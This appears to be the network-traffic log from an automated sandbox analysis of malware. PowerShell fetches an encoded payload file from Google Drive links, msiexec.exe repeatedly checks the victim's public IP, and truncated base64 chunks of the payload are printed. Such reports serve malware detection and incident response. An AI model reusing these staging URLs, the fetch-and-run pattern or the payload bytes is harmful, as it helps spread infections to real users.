                                                                            Date: Wed, 23 Oct 2024 15:23:56 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: 7c4567bda3e94de3504bfab7e7a74b49
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.1049988193.122.6.168804104C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 23, 2024 17:23:57.830698013 CEST151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Oct 23, 2024 17:23:58.656635046 CEST323INHTTP/1.1 200 OK
                                                                            Date: Wed, 23 Oct 2024 15:23:58 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: da7d0040c3748684018ed7279e39966d
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.1049990193.122.6.168804104C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 23, 2024 17:23:59.476228952 CEST151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Oct 23, 2024 17:24:00.319535971 CEST323INHTTP/1.1 200 OK
                                                                            Date: Wed, 23 Oct 2024 15:24:00 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: 89711184ef68a78a09cbef5b6f864b58
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.1049992193.122.6.168804104C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 23, 2024 17:24:01.134186029 CEST151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Oct 23, 2024 17:24:01.978270054 CEST323INHTTP/1.1 200 OK
                                                                            Date: Wed, 23 Oct 2024 15:24:01 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: 0f57bacd016edbd5d86d6a71d626d4be
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            7192.168.2.1049994193.122.6.168804104C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 23, 2024 17:24:02.780071020 CEST151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Oct 23, 2024 17:24:03.615462065 CEST323INHTTP/1.1 200 OK
                                                                            Date: Wed, 23 Oct 2024 15:24:03 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: 35c78d1648f72dc37e039daf51e75071
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.1049740142.250.185.2064437924C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-23 15:23:00 UTC215OUTGET /uc?export=download&id=1q2SN6d6sfcOEexG19WaNLkwAtt4X_kCy HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                            Host: drive.google.com
                                                                            Connection: Keep-Alive
                                                                            2024-10-23 15:23:00 UTC1610INHTTP/1.1 303 See Other
                                                                            Content-Type: application/binary
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Wed, 23 Oct 2024 15:23:00 GMT
                                                                            Location: https://drive.usercontent.google.com/download?id=1q2SN6d6sfcOEexG19WaNLkwAtt4X_kCy&export=download
                                                                            Strict-Transport-Security: max-age=31536000
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            Content-Security-Policy: script-src 'nonce-pFNHcyv2fGDS1iv0lviUSQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Server: ESF
                                                                            Content-Length: 0
                                                                            X-XSS-Protection: 0
                                                                            X-Frame-Options: SAMEORIGIN
                                                                            X-Content-Type-Options: nosniff
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.1049746142.250.185.654437924C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-23 15:23:01 UTC233OUTGET /download?id=1q2SN6d6sfcOEexG19WaNLkwAtt4X_kCy&export=download HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                            Host: drive.usercontent.google.com
                                                                            Connection: Keep-Alive
                                                                            2024-10-23 15:23:03 UTC4897INHTTP/1.1 200 OK
                                                                            Content-Type: application/octet-stream
                                                                            Content-Security-Policy: sandbox
                                                                            Content-Security-Policy: default-src 'none'
                                                                            Content-Security-Policy: frame-ancestors 'none'
                                                                            X-Content-Security-Policy: sandbox
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Cross-Origin-Embedder-Policy: require-corp
                                                                            Cross-Origin-Resource-Policy: same-site
                                                                            X-Content-Type-Options: nosniff
                                                                            Content-Disposition: attachment; filename="Blomsterkosts.psm"
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Credentials: false
                                                                            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                            Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                            Accept-Ranges: bytes
                                                                            Content-Length: 475152
                                                                            Last-Modified: Wed, 23 Oct 2024 10:02:46 GMT
                                                                            X-GUploader-UploadID: AHmUCY2NdhKBmanWFfKSqJwgNVKL2BSxpBX5rIbKALF3L4pjjnZ__AJBvY3RflFQaHV_8NXMR4kuHZPHKA
                                                                            Date: Wed, 23 Oct 2024 15:23:03 GMT
                                                                            Expires: Wed, 23 Oct 2024 15:23:03 GMT
                                                                            Cache-Control: private, max-age=0
                                                                            X-Goog-Hash: crc32c=+3BAgw==
                                                                            Server: UploadServer
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close
                                                                            2024-10-23 15:23:03 UTC4897INData Raw: 36 77 4a 4b 64 4f 73 43 61 6f 32 37 69 51 41 52 41 48 45 42 6d 33 45 42 6d 77 4e 63 4a 41 54 72 41 6b 45 38 63 51 47 62 75 61 55 46 45 2b 44 72 41 75 41 37 36 77 4c 41 5a 59 48 78 53 74 71 45 58 2b 73 43 61 70 35 78 41 5a 75 42 36 65 2f 66 6c 37 2f 72 41 67 79 4d 36 77 49 35 36 4f 73 43 4b 33 5a 78 41 5a 75 36 54 55 56 72 56 58 45 42 6d 33 45 42 6d 2b 73 43 57 59 64 78 41 5a 73 78 79 75 73 43 52 2b 7a 72 41 6d 39 47 69 52 51 4c 36 77 49 6f 43 75 73 43 51 5a 33 52 34 75 73 43 45 6c 6c 78 41 5a 75 44 77 51 54 72 41 71 34 46 63 51 47 62 67 66 6b 33 30 68 77 46 66 4d 6e 72 41 76 6c 30 36 77 4b 69 47 6f 74 45 4a 41 52 78 41 5a 74 78 41 5a 75 4a 77 2b 73 43 42 56 64 78 41 5a 75 42 77 37 45 42 58 41 44 72 41 68 4e 66 36 77 4c 51 51 37 71 61 70 48 4e 6d 36 77 4b
                                                                            Data Ascii: 6wJKdOsCao27iQARAHEBm3EBmwNcJATrAkE8cQGbuaUFE+DrAuA76wLAZYHxStqEX+sCap5xAZuB6e/fl7/rAgyM6wI56OsCK3ZxAZu6TUVrVXEBm3EBm+sCWYdxAZsxyusCR+zrAm9GiRQL6wIoCusCQZ3R4usCEllxAZuDwQTrAq4FcQGbgfk30hwFfMnrAvl06wKiGotEJARxAZtxAZuJw+sCBVdxAZuBw7EBXADrAhNf6wLQQ7qapHNm6wK
                                                                            2024-10-23 15:23:03 UTC4897INData Raw: 54 48 39 2b 59 77 73 79 63 69 71 54 35 38 51 66 46 72 6d 56 6c 7a 42 6f 42 48 49 4e 4b 43 74 79 48 41 49 62 55 54 7a 48 48 34 62 61 51 69 67 32 42 65 33 46 30 5a 4a 48 36 77 2b 42 30 46 56 38 62 52 50 47 50 7a 51 61 55 79 46 54 33 6c 4e 59 59 59 48 2b 70 6c 31 58 49 52 41 63 6b 34 64 33 32 73 52 64 55 7a 71 56 73 43 62 38 6d 69 5a 45 6d 2f 46 49 4a 74 46 51 41 63 6e 33 6f 64 6f 33 46 70 6f 42 73 4d 31 75 41 37 52 4c 56 36 64 77 33 4c 62 4a 30 54 7a 48 48 34 62 61 51 69 67 32 78 75 44 75 66 56 71 41 33 47 54 6d 72 44 2f 75 4b 6f 4b 7a 42 54 34 76 56 76 55 63 57 59 31 58 6d 46 72 4e 59 32 39 47 57 66 77 4e 54 6c 36 32 5a 5a 47 51 70 41 79 36 52 6a 5a 67 4a 35 56 63 66 62 7a 6f 64 67 78 45 46 74 4b 31 46 73 69 7a 6d 31 5a 32 73 39 69 4d 54 30 70 78 62 54 49
                                                                            Data Ascii: TH9+YwsyciqT58QfFrmVlzBoBHINKCtyHAIbUTzHH4baQig2Be3F0ZJH6w+B0FV8bRPGPzQaUyFT3lNYYYH+pl1XIRAck4d32sRdUzqVsCb8miZEm/FIJtFQAcn3odo3FpoBsM1uA7RLV6dw3LbJ0TzHH4baQig2xuDufVqA3GTmrD/uKoKzBT4vVvUcWY1XmFrNY29GWfwNTl62ZZGQpAy6RjZgJ5VcfbzodgxEFtK1Fsizm1Z2s9iMT0pxbTI
                                                                            2024-10-23 15:23:03 UTC9INData Raw: 4d 63 66 68 4e 68 43 42 7a
                                                                            Data Ascii: McfhNhCBz
                                                                            2024-10-23 15:23:03 UTC1378INData Raw: 4a 45 5a 4d 69 67 39 55 55 7a 58 6a 53 38 36 47 4b 71 30 37 42 38 41 6b 43 58 4b 79 5a 51 4f 47 37 77 2f 65 4a 6a 64 46 49 31 52 70 6c 55 64 31 52 4e 4e 32 41 76 38 75 59 44 4e 59 35 72 36 50 77 71 61 78 43 54 4a 6c 52 2f 6b 76 75 66 6e 46 57 70 61 53 58 45 33 30 6b 6d 42 4a 76 6c 5a 67 53 62 35 57 59 45 6d 2b 56 6d 42 4a 76 6c 5a 67 53 62 35 57 59 45 6d 38 65 43 49 4c 62 32 59 45 46 33 4a 55 75 51 65 51 49 42 78 4e 76 6c 63 2b 74 4d 43 72 31 53 75 35 69 2f 77 33 70 37 68 6e 56 6a 37 31 59 78 2b 35 69 34 4e 72 45 62 42 45 64 37 46 7a 2f 72 61 50 62 61 6c 32 2b 62 67 71 64 53 68 49 46 4a 78 6a 34 61 46 63 50 6e 36 65 39 2f 78 55 57 2f 31 71 65 6f 4c 56 31 39 4a 65 44 77 48 71 4b 43 62 41 35 63 71 4d 77 78 56 51 6c 43 56 68 66 79 78 2b 67 39 35 42 74 6b 2b
                                                                            Data Ascii: JEZMig9UUzXjS86GKq07B8AkCXKyZQOG7w/eJjdFI1RplUd1RNN2Av8uYDNY5r6PwqaxCTJlR/kvufnFWpaSXE30kmBJvlZgSb5WYEm+VmBJvlZgSb5WYEm8eCILb2YEF3JUuQeQIBxNvlc+tMCr1Su5i/w3p7hnVj71Yx+5i4NrEbBEd7Fz/raPbal2+bgqdShIFJxj4aFcPn6e9/xUW/1qeoLV19JeDwHqKCbA5cqMwxVQlCVhfyx+g95Btk+
                                                                            2024-10-23 15:23:03 UTC1378INData Raw: 6e 4f 6e 33 6c 36 74 6e 61 6c 49 36 73 6e 77 64 31 4e 56 63 33 33 44 39 72 68 75 4f 6e 62 4c 79 50 38 57 64 31 46 4b 47 6c 56 64 79 32 6d 48 66 52 6b 55 42 75 43 65 34 53 31 42 6f 64 68 43 31 35 4c 47 6e 70 71 67 72 31 41 32 76 37 56 65 69 45 46 48 6d 33 65 6a 78 58 6b 61 6b 67 69 77 4a 7a 4a 66 66 51 6b 70 6c 54 6b 63 41 47 68 7a 61 45 54 67 4c 70 68 59 41 78 62 78 50 58 42 59 55 63 2f 6d 6b 39 32 6a 77 75 39 79 33 53 77 4d 37 73 76 6b 49 36 45 34 4c 4c 67 33 57 65 49 34 66 67 70 70 53 45 31 49 35 46 31 5a 79 36 57 67 4c 58 69 37 51 45 54 47 66 4c 78 39 36 58 50 56 37 5a 33 47 6c 50 43 4c 47 59 34 66 57 64 43 2f 6f 6b 4f 78 67 69 54 46 6c 78 4e 37 73 5a 67 53 62 35 57 59 45 6d 2b 56 6d 42 4a 76 6c 5a 67 53 62 35 57 59 45 6d 2b 56 6d 42 4a 76 48 70 6c 30
                                                                            Data Ascii: nOn3l6tnalI6snwd1NVc33D9rhuOnbLyP8Wd1FKGlVdy2mHfRkUBuCe4S1BodhC15LGnpqgr1A2v7VeiEFHm3ejxXkakgiwJzJffQkplTkcAGhzaETgLphYAxbxPXBYUc/mk92jwu9y3SwM7svkI6E4LLg3WeI4fgppSE1I5F1Zy6WgLXi7QETGfLx96XPV7Z3GlPCLGY4fWdC/okOxgiTFlxN7sZgSb5WYEm+VmBJvlZgSb5WYEm+VmBJvHpl0
                                                                            2024-10-23 15:23:03 UTC1378INData Raw: 67 47 36 79 61 48 58 71 51 61 6d 65 5a 38 72 32 5a 45 6d 39 5a 64 52 6b 4a 7a 32 57 32 62 6c 44 45 79 76 49 79 5a 38 38 7a 4e 63 7a 4f 70 31 61 55 74 76 70 4b 44 4f 50 7a 6c 46 77 35 55 41 31 39 5a 75 48 55 47 68 67 50 53 61 6b 65 71 47 6b 43 38 2b 38 50 39 35 73 33 6b 4d 75 70 54 4e 4d 68 57 4f 35 2b 76 45 57 30 66 78 6e 35 6c 66 35 46 54 65 61 75 4a 51 48 76 73 32 32 6b 68 56 2f 63 37 52 4e 6a 6e 50 38 4c 72 69 71 30 70 4f 67 68 6e 42 55 79 4f 5a 43 74 45 4e 51 41 42 54 7a 4a 31 31 51 51 64 6b 39 66 50 75 49 78 4e 46 4c 62 48 6d 32 56 6d 42 49 4a 6d 6c 38 6b 62 35 57 59 45 6d 2b 56 6d 42 4a 76 6c 5a 67 53 62 35 57 59 45 6d 2b 56 6d 42 4a 76 6c 5a 69 4d 31 49 4b 6d 2b 79 68 78 62 4a 58 76 42 7a 78 56 31 34 70 34 53 62 6a 62 67 55 43 6a 6f 62 53 6e 46 68
                                                                            Data Ascii: gG6yaHXqQameZ8r2ZEm9ZdRkJz2W2blDEyvIyZ88zNczOp1aUtvpKDOPzlFw5UA19ZuHUGhgPSakeqGkC8+8P95s3kMupTNMhWO5+vEW0fxn5lf5FTeauJQHvs22khV/c7RNjnP8Lriq0pOghnBUyOZCtENQABTzJ11QQdk9fPuIxNFLbHm2VmBIJml8kb5WYEm+VmBJvlZgSb5WYEm+VmBJvlZiM1IKm+yhxbJXvBzxV14p4SbjbgUCjobSnFh
                                                                            2024-10-23 15:23:03 UTC1378INData Raw: 67 2f 2b 75 58 75 36 2f 36 5a 72 44 4f 56 7a 2f 77 35 4f 6b 2b 57 52 6a 46 78 76 44 7a 38 6f 42 33 76 4d 47 65 45 36 43 39 55 79 37 6d 61 45 45 52 34 51 79 36 6d 72 38 6f 49 53 37 6c 59 54 2f 53 31 48 47 65 45 67 77 38 58 41 50 51 6b 52 38 47 36 50 42 5a 61 2f 36 4a 72 73 48 78 55 51 2b 39 43 34 6e 73 68 52 66 45 31 50 63 37 4b 4a 69 36 50 4f 33 46 5a 72 79 2f 33 58 38 4a 30 2f 6c 6b 4f 62 4f 4f 62 52 4c 77 4a 2b 4a 4a 6b 65 56 52 33 41 2f 70 44 74 6b 76 37 6c 72 56 2f 52 53 4f 37 6f 37 45 35 69 6c 5a 67 64 34 68 49 38 45 6d 2f 4f 47 66 6d 4b 48 4e 6f 72 50 42 34 46 73 47 36 56 6d 45 4c 58 72 66 39 58 49 70 43 4f 64 57 56 76 6e 51 62 6a 44 31 30 2f 4e 6e 4a 68 43 31 71 63 36 75 4b 64 77 77 53 62 69 5a 79 65 6a 31 64 4d 34 51 35 70 50 44 74 78 63 41 6a 6e
                                                                            Data Ascii: g/+uXu6/6ZrDOVz/w5Ok+WRjFxvDz8oB3vMGeE6C9Uy7maEER4Qy6mr8oIS7lYT/S1HGeEgw8XAPQkR8G6PBZa/6JrsHxUQ+9C4nshRfE1Pc7KJi6PO3FZry/3X8J0/lkObOObRLwJ+JJkeVR3A/pDtkv7lrV/RSO7o7E5ilZgd4hI8Em/OGfmKHNorPB4FsG6VmELXrf9XIpCOdWVvnQbjD10/NnJhC1qc6uKdwwSbiZyej1dM4Q5pPDtxcAjn
                                                                            2024-10-23 15:23:03 UTC1378INData Raw: 62 4a 44 2f 53 43 58 47 58 66 42 31 32 79 59 68 52 4d 4a 4e 36 37 45 6b 6c 70 54 62 39 54 54 54 47 49 37 66 62 69 5a 43 54 6e 44 7a 35 4e 63 67 55 57 2b 5a 45 55 63 68 43 38 78 78 34 45 33 63 49 48 4e 6b 57 68 50 51 48 63 30 6d 43 66 30 51 43 64 4d 34 74 34 44 53 45 67 79 76 45 31 39 6b 57 43 43 75 51 68 6e 69 65 6e 45 31 39 57 53 30 46 48 4d 73 33 72 58 64 4a 58 6b 66 4b 71 48 6e 4c 75 48 54 75 5a 34 2f 68 6e 73 4d 5a 34 41 47 47 6c 58 6a 75 66 33 4b 66 37 4c 77 5a 34 4f 71 6b 77 53 4d 2f 43 52 48 79 5a 6f 55 46 64 4f 70 48 37 51 42 65 56 54 37 2f 34 33 7a 75 43 7a 46 4c 42 41 42 64 7a 38 4c 73 2f 64 2b 61 59 67 74 49 74 72 74 70 4a 46 6a 4c 58 52 56 6b 55 44 64 69 57 75 56 4f 5a 35 78 49 35 67 67 43 45 32 2b 56 7a 71 79 4e 57 4b 51 46 37 6d 4f 5a 59 58
                                                                            Data Ascii: bJD/SCXGXfB12yYhRMJN67EklpTb9TTTGI7fbiZCTnDz5NcgUW+ZEUchC8xx4E3cIHNkWhPQHc0mCf0QCdM4t4DSEgyvE19kWCCuQhnienE19WS0FHMs3rXdJXkfKqHnLuHTuZ4/hnsMZ4AGGlXjuf3Kf7LwZ4OqkwSM/CRHyZoUFdOpH7QBeVT7/43zuCzFLBABdz8Ls/d+aYgtItrtpJFjLXRVkUDdiWuVOZ5xI5ggCE2+VzqyNWKQF7mOZYX
                                                                            2024-10-23 15:23:03 UTC1378INData Raw: 42 4a 76 6c 5a 67 53 62 35 57 59 45 6d 2b 56 6d 42 4a 76 47 70 47 44 38 4d 42 32 37 66 6f 4e 6d 42 4a 76 78 69 4e 4c 47 51 30 30 6b 35 78 56 66 34 2b 33 46 48 50 30 69 70 48 73 6d 33 78 70 55 58 62 6f 52 56 57 52 45 63 5a 78 4b 4e 39 45 68 59 61 53 4f 61 59 31 55 69 57 4e 5a 72 53 51 4b 47 7a 6d 7a 73 69 71 72 56 78 76 50 32 71 70 54 6c 71 76 6b 4a 70 7a 30 49 54 4a 6a 75 5a 30 6d 52 50 79 45 47 39 75 53 63 52 54 57 32 6c 59 62 4d 6f 52 42 72 6d 53 2f 73 41 53 50 63 4f 4b 57 6d 71 44 42 67 42 72 44 43 49 64 70 48 42 48 6d 4d 67 7a 42 75 35 62 2f 47 64 67 55 75 71 6d 48 63 6f 32 45 55 68 4b 68 36 42 6a 37 5a 41 65 31 44 5a 6e 48 70 6c 53 35 70 53 58 45 36 77 79 6d 42 4a 76 6c 5a 67 53 62 35 57 59 45 6d 2b 56 6d 42 4a 76 6c 5a 67 53 62 35 57 59 45 6d 38 65
                                                                            Data Ascii: BJvlZgSb5WYEm+VmBJvGpGD8MB27foNmBJvxiNLGQ00k5xVf4+3FHP0ipHsm3xpUXboRVWREcZxKN9EhYaSOaY1UiWNZrSQKGzmzsiqrVxvP2qpTlqvkJpz0ITJjuZ0mRPyEG9uScRTW2lYbMoRBrmS/sASPcOKWmqDBgBrDCIdpHBHmMgzBu5b/GdgUuqmHco2EUhKh6Bj7ZAe1DZnHplS5pSXE6wymBJvlZgSb5WYEm+VmBJvlZgSb5WYEm8e
                                                                            2024-10-23 15:23:03 UTC1378INData Raw: 59 5a 51 55 34 71 51 49 5a 34 39 58 70 4f 37 56 67 55 71 69 4e 62 35 57 59 45 6d 2b 56 6d 42 4a 76 6c 5a 67 53 62 35 57 59 45 6d 2b 56 6d 42 4a 76 6c 5a 69 54 50 30 6d 68 56 7a 34 59 49 56 2f 77 38 6f 53 76 69 62 33 68 46 6c 49 66 42 68 31 76 68 63 55 53 62 35 57 59 45 6d 2b 56 6d 42 4a 76 6c 5a 67 53 62 35 57 59 45 6d 2b 56 6d 42 4a 76 6c 52 41 67 66 31 49 71 57 38 77 63 6d 61 2b 7a 46 47 6b 48 39 2b 43 7a 48 57 36 42 76 42 4a 76 6c 5a 67 53 62 35 57 59 45 6d 2b 56 6d 42 4a 76 6c 5a 67 53 62 35 57 59 45 6d 2b 56 48 4a 50 71 33 37 66 6a 56 72 4f 72 72 38 70 6c 41 68 41 6a 46 47 6c 38 63 51 59 36 2b 30 2b 55 6d 42 49 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43
                                                                            Data Ascii: YZQU4qQIZ49XpO7VgUqiNb5WYEm+VmBJvlZgSb5WYEm+VmBJvlZiTP0mhVz4YIV/w8oSvib3hFlIfBh1vhcUSb5WYEm+VmBJvlZgSb5WYEm+VmBJvlRAgf1IqW8wcma+zFGkH9+CzHW6BvBJvlZgSb5WYEm+VmBJvlZgSb5WYEm+VHJPq37fjVrOrr8plAhAjFGl8cQY6+0+UmBIAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAAC


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.1049970142.250.185.2064434104C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-23 15:23:44 UTC216OUTGET /uc?export=download&id=12MwqeCdK8xb_X0qoPbapEA6uXWAlxo8b HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                            Host: drive.google.com
                                                                            Cache-Control: no-cache
                                                                            2024-10-23 15:23:44 UTC1610INHTTP/1.1 303 See Other
                                                                            Content-Type: application/binary
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Wed, 23 Oct 2024 15:23:44 GMT
                                                                            Location: https://drive.usercontent.google.com/download?id=12MwqeCdK8xb_X0qoPbapEA6uXWAlxo8b&export=download
                                                                            Strict-Transport-Security: max-age=31536000
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                            Content-Security-Policy: script-src 'nonce-1atmTp39x0i0PTMcCAxV8w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
